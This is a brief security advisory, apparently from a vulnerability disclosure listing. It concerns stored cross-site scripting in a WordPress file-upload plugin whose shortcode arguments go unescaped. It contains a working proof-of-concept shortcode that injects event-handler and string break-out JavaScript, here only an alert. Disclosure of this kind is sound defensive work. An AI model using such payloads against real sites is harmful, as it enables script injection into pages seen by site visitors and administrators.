The plugin does not escape some of its shortcode argument, which could allow users with a role as low as Contributor to perform Cross-Site Scripting attacks
[wordpress_file_upload widths='title:1;animation-name:twentytwentyone-close-button-transition" onanimationend="alert(/XSS-widths/)' resetmode='"+alert(/XSS-restmode/)&&"']